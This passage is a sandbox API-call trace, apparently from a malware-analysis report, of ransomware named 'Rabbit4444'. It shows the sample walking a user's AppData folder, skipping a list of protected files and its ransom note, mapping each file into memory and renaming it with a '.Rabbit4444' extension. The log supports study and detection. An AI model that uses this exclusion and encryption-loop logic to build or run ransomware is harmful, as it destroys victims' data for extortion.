lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15918999444) returned 1 [0067.879] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0067.879] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.880] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.882] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15919282789) returned 1 [0067.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0067.882] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.882] CloseHandle (hObject=0x29c) returned 1 [0067.882] CloseHandle (hObject=0x280) returned 1 [0067.882] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4CCC5AFB-555C-44D5-892C-F0F2617C631D}.Rabbit4444") returned 156 [0067.882] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4CCC5AFB-555C-44D5-892C-F0F2617C631D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4ccc5afb-555c-44d5-892c-f0f2617c631d}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4CCC5AFB-555C-44D5-892C-F0F2617C631D}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4ccc5afb-555c-44d5-892c-f0f2617c631d}.rabbit4444"), dwFlags=0x1) returned 1 [0067.883] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98965b15, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98965b15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x41d8710a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{4DC87667-8E09-4718-960C-CACE353718FC}", cAlternateFileName="{4DC87~1")) returned 1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="Rabbit4444.exe") returned -1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2=".") returned 1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="..") returned 1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="windows") returned -1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="bootmgr") returned -1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="pagefile.sys") returned -1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="boot") returned -1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="ids.txt") returned -1 [0067.883] lstrcmpiW (lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}", lpString2="NTUSER.DAT") returned -1 [0067.883] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{4DC87667-8E09-4718-960C-CACE353718FC}" | out: lpString1="{4DC87667-8E09-4718-960C-CACE353718FC}") returned="{4DC87667-8E09-4718-960C-CACE353718FC}" [0067.883] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4DC87667-8E09-4718-960C-CACE353718FC}", dwFileAttributes=0x0) returned 1 [0067.884] lstrlenW (lpString="{4DC87667-8E09-4718-960C-CACE353718FC}") returned 38 [0067.884] lstrlenW (lpString="Rabbit4444") returned 10 [0067.884] lstrcmpiW (lpString1="E353718FC}", lpString2="Rabbit4444") returned -1 [0067.884] lstrlenW (lpString=".dll") returned 4 [0067.884] lstrcmpiW (lpString1="8FC}", lpString2=".dll") returned 1 [0067.884] lstrlenW (lpString=".lnk") returned 4 [0067.884] lstrcmpiW (lpString1="8FC}", lpString2=".lnk") returned 1 [0067.884] lstrlenW (lpString=".ini") returned 4 [0067.884] lstrcmpiW (lpString1="8FC}", lpString2=".ini") returned 1 [0067.884] lstrlenW (lpString=".sys") returned 4 [0067.884] lstrcmpiW (lpString1="8FC}", lpString2=".sys") returned 1 [0067.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4DC87667-8E09-4718-960C-CACE353718FC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4dc87667-8e09-4718-960c-cace353718fc}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.884] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.884] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15919521273) returned 1 [0067.885] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0067.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0067.885] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.886] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.887] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.887] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.887] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.887] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.887] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.887] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.887] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.888] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15919832242) returned 1 [0067.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0067.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0067.888] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.888] CloseHandle (hObject=0x29c) returned 1 [0067.888] CloseHandle (hObject=0x280) returned 1 [0067.888] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4DC87667-8E09-4718-960C-CACE353718FC}.Rabbit4444") returned 156 [0067.888] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4DC87667-8E09-4718-960C-CACE353718FC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4dc87667-8e09-4718-960c-cace353718fc}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4DC87667-8E09-4718-960C-CACE353718FC}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4dc87667-8e09-4718-960c-cace353718fc}.rabbit4444"), dwFlags=0x1) returned 1 [0067.889] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98965b15, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98965b15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", cAlternateFileName="{4E705~1")) returned 1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="Rabbit4444.exe") returned -1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2=".") returned 1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="..") returned 1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="windows") returned -1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="bootmgr") returned -1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="pagefile.sys") returned -1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="boot") returned -1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="ids.txt") returned -1 [0067.889] lstrcmpiW (lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", lpString2="NTUSER.DAT") returned -1 [0067.889] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}" | out: lpString1="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}") returned="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}" [0067.889] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}", dwFileAttributes=0x0) returned 1 [0067.889] lstrlenW (lpString="{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}") returned 38 [0067.889] lstrlenW (lpString="Rabbit4444") returned 10 [0067.889] lstrcmpiW (lpString1="8FDD509FD}", lpString2="Rabbit4444") returned -1 [0067.889] lstrlenW (lpString=".dll") returned 4 [0067.889] lstrcmpiW (lpString1="9FD}", lpString2=".dll") returned 1 [0067.889] lstrlenW (lpString=".lnk") returned 4 [0067.889] lstrcmpiW (lpString1="9FD}", lpString2=".lnk") returned 1 [0067.889] lstrlenW (lpString=".ini") returned 4 [0067.889] lstrcmpiW (lpString1="9FD}", lpString2=".ini") returned 1 [0067.890] lstrlenW (lpString=".sys") returned 4 [0067.890] lstrcmpiW (lpString1="9FD}", lpString2=".sys") returned 1 [0067.890] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4e7056c1-8f8c-45de-873f-dc08fdd509fd}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.890] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.890] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15920070609) returned 1 [0067.890] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0067.890] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.891] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.892] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.893] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15920334084) returned 1 [0067.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0067.893] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.893] CloseHandle (hObject=0x29c) returned 1 [0067.893] CloseHandle (hObject=0x280) returned 1 [0067.893] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}.Rabbit4444") returned 156 [0067.893] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4e7056c1-8f8c-45de-873f-dc08fdd509fd}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{4E7056C1-8F8C-45DE-873F-DC08FDD509FD}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{4e7056c1-8f8c-45de-873f-dc08fdd509fd}.rabbit4444"), dwFlags=0x1) returned 1 [0067.894] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380da02c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x380da02c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", cAlternateFileName="{51B0B~1")) returned 1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="Rabbit4444.exe") returned -1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2=".") returned 1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="..") returned 1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="windows") returned -1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="bootmgr") returned -1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="pagefile.sys") returned -1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="boot") returned -1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="ids.txt") returned -1 [0067.894] lstrcmpiW (lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", lpString2="NTUSER.DAT") returned -1 [0067.894] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}" | out: lpString1="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}") returned="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}" [0067.894] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{51B0B7BF-2B1A-4FE9-8814-408CD303875D}", dwFileAttributes=0x0) returned 1 [0067.895] lstrlenW (lpString="{51B0B7BF-2B1A-4FE9-8814-408CD303875D}") returned 38 [0067.895] lstrlenW (lpString="Rabbit4444") returned 10 [0067.895] lstrcmpiW (lpString1="CD303875D}", lpString2="Rabbit4444") returned -1 [0067.895] lstrlenW (lpString=".dll") returned 4 [0067.895] lstrcmpiW (lpString1="75D}", lpString2=".dll") returned 1 [0067.895] lstrlenW (lpString=".lnk") returned 4 [0067.895] lstrcmpiW (lpString1="75D}", lpString2=".lnk") returned 1 [0067.895] lstrlenW (lpString=".ini") returned 4 [0067.895] lstrcmpiW (lpString1="75D}", lpString2=".ini") returned 1 [0067.895] lstrlenW (lpString=".sys") returned 4 [0067.895] lstrcmpiW (lpString1="75D}", lpString2=".sys") returned 1 [0067.896] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{51B0B7BF-2B1A-4FE9-8814-408CD303875D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{51b0b7bf-2b1a-4fe9-8814-408cd303875d}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.896] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.896] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15920665415) returned 1 [0067.896] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0067.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0067.896] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.897] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.898] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.898] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.898] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.899] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.899] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.899] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15920934936) returned 1 [0067.899] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0067.899] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0067.899] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.899] CloseHandle (hObject=0x29c) returned 1 [0067.899] CloseHandle (hObject=0x280) returned 1 [0067.899] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{51B0B7BF-2B1A-4FE9-8814-408CD303875D}.Rabbit4444") returned 156 [0067.899] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{51B0B7BF-2B1A-4FE9-8814-408CD303875D}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{51b0b7bf-2b1a-4fe9-8814-408cd303875d}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{51B0B7BF-2B1A-4FE9-8814-408CD303875D}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{51b0b7bf-2b1a-4fe9-8814-408cd303875d}.rabbit4444"), dwFlags=0x1) returned 1 [0067.900] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98965b15, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98965b15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", cAlternateFileName="{5202C~1")) returned 1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="Rabbit4444.exe") returned -1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2=".") returned 1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="..") returned 1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="windows") returned -1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="bootmgr") returned -1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="pagefile.sys") returned -1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="boot") returned -1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="ids.txt") returned -1 [0067.900] lstrcmpiW (lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}", lpString2="NTUSER.DAT") returned -1 [0067.900] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{5202C284-5887-45AA-A00F-FDE7E88E85ED}" | out: lpString1="{5202C284-5887-45AA-A00F-FDE7E88E85ED}") returned="{5202C284-5887-45AA-A00F-FDE7E88E85ED}" [0067.900] SetFileAttributesW 